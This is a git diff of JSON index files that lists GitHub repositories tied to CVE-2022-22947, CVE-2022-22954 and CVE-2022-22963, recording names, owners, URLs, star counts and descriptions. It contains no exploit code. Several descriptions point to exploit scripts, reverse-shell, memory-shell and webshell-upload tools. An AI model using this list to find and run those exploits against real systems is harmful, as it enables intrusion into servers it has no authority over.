"forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467021913, + "name": "SpEL", + "full_name": "YutuSec\/SpEL", + "owner": { + "login": "YutuSec", + "id": 41934714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41934714?v=4", + "html_url": "https:\/\/github.com\/YutuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YutuSec\/SpEL", + "description": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)批量检测工具", + "fork": false, + "created_at": "2022-03-07T09:14:50Z", + "updated_at": "2024-08-12T20:21:19Z", + "pushed_at": "2022-03-08T02:09:38Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467073196, + "name": "CVE-2022-22947", + "full_name": "Jun-5heng\/CVE-2022-22947", + "owner": { + "login": "Jun-5heng", + "id": 88525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4", + "html_url": "https:\/\/github.com\/Jun-5heng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2022-22947", + "description": "SpringCloudGatewayRCE \/ Code By:Jun_sheng", + "fork": false, + "created_at": "2022-03-07T11:53:51Z", + "updated_at": "2022-11-08T08:59:28Z", + "pushed_at": "2022-03-29T06:10:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467145231, + "name": "cve-2022-22947", + "full_name": "darkb1rd\/cve-2022-22947", + "owner": { + "login": "darkb1rd", + "id": 78224070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78224070?v=4", + "html_url": "https:\/\/github.com\/darkb1rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darkb1rd\/cve-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-07T15:12:45Z", + "updated_at": "2024-12-19T09:46:33Z", + "pushed_at": "2022-03-07T15:28:16Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467171493, + "name": "CVE-2022-22947", + "full_name": "mrknow001\/CVE-2022-22947", + "owner": { + "login": "mrknow001", + "id": 46807619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46807619?v=4", + "html_url": "https:\/\/github.com\/mrknow001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrknow001\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)", + "fork": false, + "created_at": "2022-03-07T16:24:42Z", + "updated_at": "2023-06-05T02:20:08Z", + "pushed_at": "2022-03-08T07:05:18Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467446398, + "name": "CVE-2022-22947", + "full_name": "0x7eTeam\/CVE-2022-22947", + "owner": { + "login": "0x7eTeam", + "id": 96908273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4", + "html_url": "https:\/\/github.com\/0x7eTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2022-22947", + "description": "CVE-2022-22947_EXP,CVE-2022-22947_RCE,CVE-2022-22947反弹shell,CVE-2022-22947 getshell", + "fork": false, + "created_at": "2022-03-08T09:32:36Z", + "updated_at": "2024-08-12T20:21:22Z", + "pushed_at": "2022-03-08T09:36:31Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467458148, + "name": "Spring-Cloud-GateWay-CVE-2022-22947-demon-code", + "full_name": "ba1ma0\/Spring-Cloud-GateWay-CVE-2022-22947-demon-code", + "owner": { + "login": "ba1ma0", + "id": 32502627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32502627?v=4", + "html_url": "https:\/\/github.com\/ba1ma0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ba1ma0\/Spring-Cloud-GateWay-CVE-2022-22947-demon-code", + "description": "调试代码包含断点信息,直接导入即可进行调试", + "fork": false, + "created_at": "2022-03-08T10:07:54Z", + "updated_at": "2022-03-09T07:44:58Z", + "pushed_at": "2022-03-09T07:44:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 468185090, + "name": "CVE-2022-22947_exp", + "full_name": "Arrnitage\/CVE-2022-22947_exp", + "owner": { + "login": "Arrnitage", + "id": 48816467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48816467?v=4", + "html_url": "https:\/\/github.com\/Arrnitage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arrnitage\/CVE-2022-22947_exp", + "description": "CVE-2022-22947 Exploit script", + "fork": false, + "created_at": "2022-03-10T03:51:47Z", + "updated_at": "2024-08-12T20:21:25Z", + "pushed_at": "2022-03-10T08:43:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 468214144, + "name": "Spring-CVE-2022-22947-", + "full_name": "PaoPaoLong-lab\/Spring-CVE-2022-22947-", + "owner": { + "login": "PaoPaoLong-lab", + "id": 76150756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76150756?v=4", + "html_url": "https:\/\/github.com\/PaoPaoLong-lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PaoPaoLong-lab\/Spring-CVE-2022-22947-", + "description": null, + "fork": false, + "created_at": "2022-03-10T06:01:32Z", + "updated_at": "2022-03-10T10:46:36Z", + "pushed_at": "2022-03-10T10:46:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468567023, + "name": "cve-2022-22947-docker", + "full_name": "hh-hunter\/cve-2022-22947-docker", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/cve-2022-22947-docker", + "description": "cve-2022-22947-docker", + "fork": false, + "created_at": "2022-03-11T01:27:55Z", + "updated_at": "2022-03-11T01:27:55Z", + "pushed_at": "2022-03-11T02:53:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, { "id": 469331651, "name": "spring-cloud-gateway-rce", @@ -61,6 +867,103 @@ "score": 0, "subscribers_count": 2 }, + { + "id": 470075351, + "name": "CVE-2022-22947", + "full_name": "bysinks\/CVE-2022-22947", + "owner": { + "login": "bysinks", + "id": 50199185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50199185?v=4", + "html_url": "https:\/\/github.com\/bysinks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bysinks\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-15T08:50:13Z", + "updated_at": "2022-04-04T14:44:21Z", + "pushed_at": "2022-03-15T08:52:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 470921945, + "name": "CVE-2022-22947", + "full_name": "Wrin9\/CVE-2022-22947", + "owner": { + "login": "Wrin9", + "id": 54984589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4", + "html_url": "https:\/\/github.com\/Wrin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrin9\/CVE-2022-22947", + "description": "CVE-2022-22947_POC_EXP", + "fork": false, + "created_at": "2022-03-17T09:12:51Z", + "updated_at": "2024-08-12T20:21:38Z", + "pushed_at": "2022-03-17T09:58:23Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 471270998, + "name": "spring_cloud_gateway_memshell", + "full_name": "viemsr\/spring_cloud_gateway_memshell", + "owner": { + "login": "viemsr", + "id": 49220017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49220017?v=4", + "html_url": "https:\/\/github.com\/viemsr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viemsr\/spring_cloud_gateway_memshell", + "description": "CVE-2022-22947 memshell", + "fork": false, + "created_at": "2022-03-18T07:17:17Z", + "updated_at": "2024-05-31T14:33:06Z", + "pushed_at": "2022-03-18T07:17:45Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cloud-gateway-poc", + "cve-2022-22947", + "memshell" + ], + "visibility": "public", + "forks": 1, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, { "id": 472548304, "name": "cve-2022-22947-spring-cloud-gateway", @@ -92,6 +995,192 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 474005175, + "name": "CVE-2022-22947", + "full_name": "Nathaniel1025\/CVE-2022-22947", + "owner": { + "login": "Nathaniel1025", + "id": 96125538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96125538?v=4", + "html_url": "https:\/\/github.com\/Nathaniel1025", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nathaniel1025\/CVE-2022-22947", + "description": "poc for CVE-2022-22947", + "fork": false, + "created_at": "2022-03-25T12:43:53Z", + "updated_at": "2023-04-04T13:54:17Z", + "pushed_at": "2022-03-25T12:57:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475545855, + "name": "CVE-2022-22947", + "full_name": "Vancomycin-g\/CVE-2022-22947", + "owner": { + "login": "Vancomycin-g", + "id": 75327057, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75327057?v=4", + "html_url": "https:\/\/github.com\/Vancomycin-g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vancomycin-g\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-29T17:17:34Z", + "updated_at": "2022-04-11T12:37:37Z", + "pushed_at": "2022-03-30T15:43:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475703854, + "name": "CVE-2022-22947-exp", + "full_name": "scopion\/CVE-2022-22947-exp", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2022-22947-exp", + "description": null, + "fork": false, + "created_at": "2022-03-30T03:22:50Z", + "updated_at": "2022-04-14T01:12:30Z", + "pushed_at": "2022-03-30T03:15:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476084548, + "name": "springcloudRCE", + "full_name": "sagaryadav8742\/springcloudRCE", + "owner": { + "login": "sagaryadav8742", + "id": 42890650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42890650?v=4", + "html_url": "https:\/\/github.com\/sagaryadav8742", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sagaryadav8742\/springcloudRCE", + "description": "Spring Cloud Gateway RCE - CVE-2022-22947 ", + "fork": false, + "created_at": "2022-03-30T23:33:43Z", + "updated_at": "2022-03-31T06:53:10Z", + "pushed_at": "2022-03-30T23:35:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476087252, + "name": "CVE-2022-22947", + "full_name": "fbion\/CVE-2022-22947", + "owner": { + "login": "fbion", + "id": 6179189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6179189?v=4", + "html_url": "https:\/\/github.com\/fbion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fbion\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API SpEL Code Injection.", + "fork": false, + "created_at": "2022-03-30T23:47:39Z", + "updated_at": "2023-07-28T03:28:19Z", + "pushed_at": "2022-03-04T18:45:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476673811, + "name": "Spring-Cloud-Gateway-CVE-2022-22947", + "full_name": "talentsec\/Spring-Cloud-Gateway-CVE-2022-22947", + "owner": { + "login": "talentsec", + "id": 20452803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20452803?v=4", + "html_url": "https:\/\/github.com\/talentsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/talentsec\/Spring-Cloud-Gateway-CVE-2022-22947", + "description": "Spring-Cloud-Gateway-CVE-2022-22947", + "fork": false, + "created_at": "2022-04-01T10:24:02Z", + "updated_at": "2022-04-02T02:07:44Z", + "pushed_at": "2022-04-01T10:24:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, { "id": 478073054, "name": "CVE-2022-22947-POC-Reproduce", @@ -408,5 +1497,253 @@ "watchers": 16, "score": 0, "subscribers_count": 1 + }, + { + "id": 513057641, + "name": "CVE-2022-22947", + "full_name": "kmahyyg\/CVE-2022-22947", + "owner": { + "login": "kmahyyg", + "id": 16604643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16604643?v=4", + "html_url": "https:\/\/github.com\/kmahyyg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kmahyyg\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-07-12T08:20:02Z", + "updated_at": "2022-07-12T08:40:46Z", + "pushed_at": "2022-07-12T08:24:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 520716888, + "name": "CVE-2022-22947", + "full_name": "LY613313\/CVE-2022-22947", + "owner": { + "login": "LY613313", + "id": 79431359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79431359?v=4", + "html_url": "https:\/\/github.com\/LY613313", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LY613313\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-08-03T02:51:26Z", + "updated_at": "2022-09-26T04:06:18Z", + "pushed_at": "2022-08-03T03:09:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 527864103, + "name": "CVE-2022-22947", + "full_name": "SiJiDo\/CVE-2022-22947", + "owner": { + "login": "SiJiDo", + "id": 28096209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28096209?v=4", + "html_url": "https:\/\/github.com\/SiJiDo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SiJiDo\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-08-23T06:38:46Z", + "updated_at": "2024-02-28T14:26:36Z", + "pushed_at": "2022-08-23T06:40:24Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566244243, + "name": "CVE-2022-22947", + "full_name": "qq87234770\/CVE-2022-22947", + "owner": { + "login": "qq87234770", + "id": 32386331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32386331?v=4", + "html_url": "https:\/\/github.com\/qq87234770", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qq87234770\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-11-15T09:11:14Z", + "updated_at": "2022-11-16T01:22:01Z", + "pushed_at": "2022-11-15T09:16:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 598386749, + "name": "CVE-2022-22947", + "full_name": "Zh0um1\/CVE-2022-22947", + "owner": { + "login": "Zh0um1", + "id": 94421064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94421064?v=4", + "html_url": "https:\/\/github.com\/Zh0um1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zh0um1\/CVE-2022-22947", + "description": "CVE-2022-22947注入哥斯拉内存马", + "fork": false, + "created_at": "2023-02-07T01:59:01Z", + "updated_at": "2024-10-29T11:26:33Z", + "pushed_at": "2023-06-21T15:43:11Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645770114, + "name": "CVE-2022-22947", + "full_name": "Le1a\/CVE-2022-22947", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行Exp", + "fork": false, + "created_at": "2023-05-26T11:52:22Z", + "updated_at": "2023-06-02T03:47:18Z", + "pushed_at": "2023-05-27T04:38:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738464216, + "name": "CVE-2022-22947", + "full_name": "Sumitpathania03\/CVE-2022-22947", + "owner": { + "login": "Sumitpathania03", + "id": 126046383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126046383?v=4", + "html_url": "https:\/\/github.com\/Sumitpathania03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sumitpathania03\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2024-01-03T09:37:54Z", + "updated_at": "2024-11-26T09:43:53Z", + "pushed_at": "2024-04-02T06:35:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817383255, + "name": "CVE-2022-22947", + "full_name": "cc3305\/CVE-2022-22947", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2022-22947", + "description": "CVE-2022-22947 exploit script", + "fork": false, + "created_at": "2024-06-19T15:31:19Z", + "updated_at": "2024-07-27T20:16:38Z", + "pushed_at": "2024-07-27T20:16:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-22954.json b/2022/CVE-2022-22954.json index da4ad42d20..61b5cb3a1b 100644 --- a/2022/CVE-2022-22954.json +++ b/2022/CVE-2022-22954.json @@ -714,5 +714,105 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 524471767, + "name": "CVE-2022-22954", + "full_name": "amit-pathak009\/CVE-2022-22954", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-22954", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:00:04Z", + "updated_at": "2022-06-02T01:44:19Z", + "pushed_at": "2022-06-02T01:44:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 524471940, + "name": "CVE-2022-22954-PoC", + "full_name": "amit-pathak009\/CVE-2022-22954-PoC", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-22954-PoC", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:00:39Z", + "updated_at": "2022-06-01T22:41:09Z", + "pushed_at": "2022-06-01T22:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 545257457, + "name": "VcenterKiller", + "full_name": "Schira4396\/VcenterKiller", + "owner": { + "login": "Schira4396", + "id": 57404930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57404930?v=4", + "html_url": "https:\/\/github.com\/Schira4396", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Schira4396\/VcenterKiller", + "description": "一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972\/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接", + "fork": false, + "created_at": "2022-10-04T03:39:27Z", + "updated_at": "2025-01-07T00:45:39Z", + "pushed_at": "2024-04-25T06:09:38Z", + "stargazers_count": 1363, + "watchers_count": 1363, + "has_discussions": false, + "forks_count": 167, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "go", + "golang", + "log4j", + "log4shell", + "scan", + "vcenter" + ], + "visibility": "public", + "forks": 167, + "watchers": 1363, + "score": 0, + "subscribers_count": 15 } ] \ No newline at end of file diff --git a/2022/CVE-2022-22963.json b/2022/CVE-2022-22963.json index 6ddd02a125..043f2264d2 100644 --- a/2022/CVE-2022-22963.json +++ b/2022/CVE-2022-22963.json @@ -40,6 +40,68 @@ "score": 0, "subscribers_count": 11 }, + { + "id": 475726184, + "name": "CVE-2022-22963", + "full_name": "dinosn\/CVE-2022-22963", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/CVE-2022-22963", + "description": "CVE-2022-22963 PoC ", + "fork": false, + "created_at": "2022-03-30T05:04:24Z", + "updated_at": "2024-12-14T15:02:55Z", + "pushed_at": "2022-03-30T06:01:04Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 116, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 475850261, + "name": "CVE-2022-22963", + "full_name": "RanDengShiFu\/CVE-2022-22963", + "owner": { + "login": "RanDengShiFu", + "id": 40227914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40227914?v=4", + "html_url": "https:\/\/github.com\/RanDengShiFu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RanDengShiFu\/CVE-2022-22963", + "description": "CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit", + "fork": false, + "created_at": "2022-03-30T11:36:42Z", + "updated_at": "2024-11-29T07:17:40Z", + "pushed_at": "2022-03-30T11:54:22Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, { "id": 475948668, "name": "CVE-2022-22963", @@ -71,6 +133,235 @@ "score": 0, "subscribers_count": 2 }, + { + "id": 475986847, + "name": "CVE-2022-22963-PoC", + "full_name": "Kirill89\/CVE-2022-22963-PoC", + "owner": { + "login": "Kirill89", + "id": 2003936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2003936?v=4", + "html_url": "https:\/\/github.com\/Kirill89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kirill89\/CVE-2022-22963-PoC", + "description": null, + "fork": false, + "created_at": "2022-03-30T17:37:35Z", + "updated_at": "2023-02-15T10:03:43Z", + "pushed_at": "2022-03-30T17:40:21Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476016878, + "name": "Spring0DayCoreExploit", + "full_name": "stevemats\/Spring0DayCoreExploit", + "owner": { + "login": "stevemats", + "id": 30528167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30528167?v=4", + "html_url": "https:\/\/github.com\/stevemats", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stevemats\/Spring0DayCoreExploit", + "description": "{ Spring Core 0day CVE-2022-22963 }", + "fork": false, + "created_at": "2022-03-30T19:07:35Z", + "updated_at": "2023-04-18T13:31:19Z", + "pushed_at": "2022-03-30T19:10:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476271423, + "name": "CVE-2022-22963", + "full_name": "puckiestyle\/CVE-2022-22963", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": 